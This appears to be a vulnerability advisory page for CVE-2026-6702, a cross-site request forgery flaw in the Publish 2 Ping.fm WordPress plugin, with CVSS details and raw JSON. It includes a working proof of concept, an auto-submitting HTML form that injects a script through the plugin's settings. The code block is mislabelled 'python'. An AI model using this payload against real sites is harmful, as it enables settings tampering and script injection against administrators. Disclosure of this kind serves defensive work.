Security Vulnerability Report
中文
CVE-2026-6702 CVSS 6.1 MEDIUM

CVE-2026-6702

Published: 2026-05-05 03:16:01
Last Modified: 2026-05-05 19:09:32

Description

The Publish 2 Ping.fm plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.1. This is due to missing or incorrect nonce validation on the '/wp-admin/options-general.php?page=admin.php' page. This makes it possible for unauthenticated attackers to update settings and inject malicious web scripts via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.

CVSS Details

CVSS Score
6.1
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Publish 2 Ping.fm <= 1.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
<!-- Proof of Concept for CVE-2026-6702 --> <!-- Attacker hosts this file and tricks the admin into visiting it --> <html> <body> <form action="http://target-site/wp-admin/options-general.php?page=admin.php" method="POST"> <!-- Input fields mimicking the vulnerable plugin settings --> <input type="hidden" name="ping_fm_api_key" value='"><script>alert(1)</script><"' /> <input type="hidden" name="submit" value="Save Changes" /> </form> <script> // Automatically submit the form when the page loads document.forms[0].submit(); </script> </body> </html>

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-6702", "sourceIdentifier": "[email protected]", "published": "2026-05-05T03:16:00.943", "lastModified": "2026-05-05T19:09:32.000", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Publish 2 Ping.fm plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.1. This is due to missing or incorrect nonce validation on the '/wp-admin/options-general.php?page=admin.php' page. This makes it possible for unauthenticated attackers to update settings and inject malicious web scripts via a forged request granted they can trick a site administrator into performing an action such as clicking on a link."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-352"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/publish-2-pingfm/tags/1.1/php/admin.php#L136", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/publish-2-pingfm/tags/1.1/php/admin.php#L76", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/publish-2-pingfm/tags/1.1/php/prefs.php#L219", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/publish-2-pingfm/trunk/php/admin.php#L136", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/publish-2-pingfm/trunk/php/admin.php#L76", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/publish-2-pingfm/trunk/php/prefs.php#L219", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/c0dc5349-139a-4bf3-8503-0e75b132c68c?source=cve", "source": "[email protected]"}]}}